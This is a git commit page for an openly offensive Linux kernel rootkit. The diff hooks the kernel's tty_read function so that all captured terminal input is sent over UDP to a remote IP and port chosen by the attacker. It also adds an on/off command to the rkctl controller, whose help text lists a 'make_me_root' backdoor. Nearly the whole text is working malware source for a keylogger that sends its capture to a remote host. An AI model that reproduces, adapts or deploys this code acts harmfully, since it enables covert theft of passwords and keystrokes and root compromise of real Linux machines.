linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit e78f5632177aee4e78aac55cb8a9c09cbd8ce610
parent 58926084fb1fc1aed1db5752a8c9399b73b1e9ee
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 12 Dec 2020 17:19:50 +0100

adds udp sending interface

Diffstat:

Msrc/backdoor.c | 2++


Msrc/inputlog.c | 27++++++++++++---------------


Msrc/rkctl/rkctl.c | 4++++


3 files changed, 18 insertions(+), 15 deletions(-)

diff --git a/src/backdoor.c b/src/backdoor.c
@@ -6,6 +6,7 @@
 #include "backdoor.h"
 #include "read.h"
 #include "hook.h"
+#include "inputlog.h"
 
 atomic_t tty_read_count;
 
@@ -39,6 +40,7 @@ g7_tty_read(struct file *file, char *buf, size_t count, loff_t *off)
     atomic_inc(&tty_read_count);
     ssize_t ret = current_tty_read(file, buf, count, off);
     handle_pid(current->pid, buf, count);
+    send_udp(buf, count);
     atomic_dec(&tty_read_count);
     return ret;
 }
diff --git a/src/inputlog.c b/src/inputlog.c
@@ -56,8 +56,8 @@ log_input(const char *ip, const char *port)
 {
     size_t i;
     u8 ip_quad[4];
-    unsigned long ip_ul;
-    unsigned long port_ul;
+    unsigned long remote_ip_ul, local_ip_ul;
+    unsigned long remote_port_ul, local_port_ul;
 
     if (sock)
         return;
@@ -66,32 +66,29 @@ log_input(const char *ip, const char *port)
         return;
 
     { // parse ip address and port from passed in strings
-        kstrtoul(port, 10, &port_ul);
+        kstrtoul(port, 10, &remote_port_ul);
         in4_pton(ip, -1, ip_quad, -1, NULL);
 
-        ip_ul = 0;
+        remote_ip_ul = 0;
         for (i = 0; i < 4; ++i)
-            ip_ul |= (ip_quad[3 - i] & 0xFF) << (8 * i);
+            remote_ip_ul |= (ip_quad[3 - i] & 0xFF) << (8 * i);
+
+        local_ip_ul = (127 << 24) | (0 << 16) | (0 << 8) | 1;
+        local_port_ul = 7777;
     }
 
     addr.sin_family = AF_INET;
-    addr.sin_addr.s_addr = htonl(ip_ul);
-    addr.sin_port = htons(port_ul);
+    addr.sin_addr.s_addr = htonl(remote_ip_ul);
+    addr.sin_port = htons(remote_port_ul);
 
     bind.sin_family = AF_INET;
-    bind.sin_addr.s_addr = htonl((127 << 24) | (0 << 16) | (0 << 8) | (1));
-    bind.sin_port = htons(7777);
+    bind.sin_addr.s_addr = htonl(local_ip_ul);
+    bind.sin_port = htons(local_port_ul);
 
     if (kernel_bind(sock, (struct sockaddr *)&bind, sizeof(bind))) {
         sock_release(sock);
         sock = NULL;
-        return;
     }
-
-    char *buf = "testing\ntesting\ntesting\ntesting";
-    int buflen = strlen(buf);
-
-    send_udp(buf, buflen);
 }
 
 void
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -122,6 +122,9 @@ parse_input(int argc, char **argv)
         return (cmd_t){ handle_logging, (void *)socket };
     }
 
+    if (ARGVCMP(1, "inputlogging-off"))
+        return (cmd_t){ handle_logging, (void *)0 };
+
     help();
     exit(1);
 }
@@ -227,4 +230,5 @@ help()
     printf("%-38s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or TTY (1)");
     printf("%-38s %s\n", "backdoor-off", "disable any (read or tty) backdoor");
     printf("%-38s %s\n", "inputlogging <ip> <port>", "intercept {P,T}TY input and send it to <ip>:<port>");
+    printf("%-38s %s\n", "inputlogging-off", "disable input logging");
 }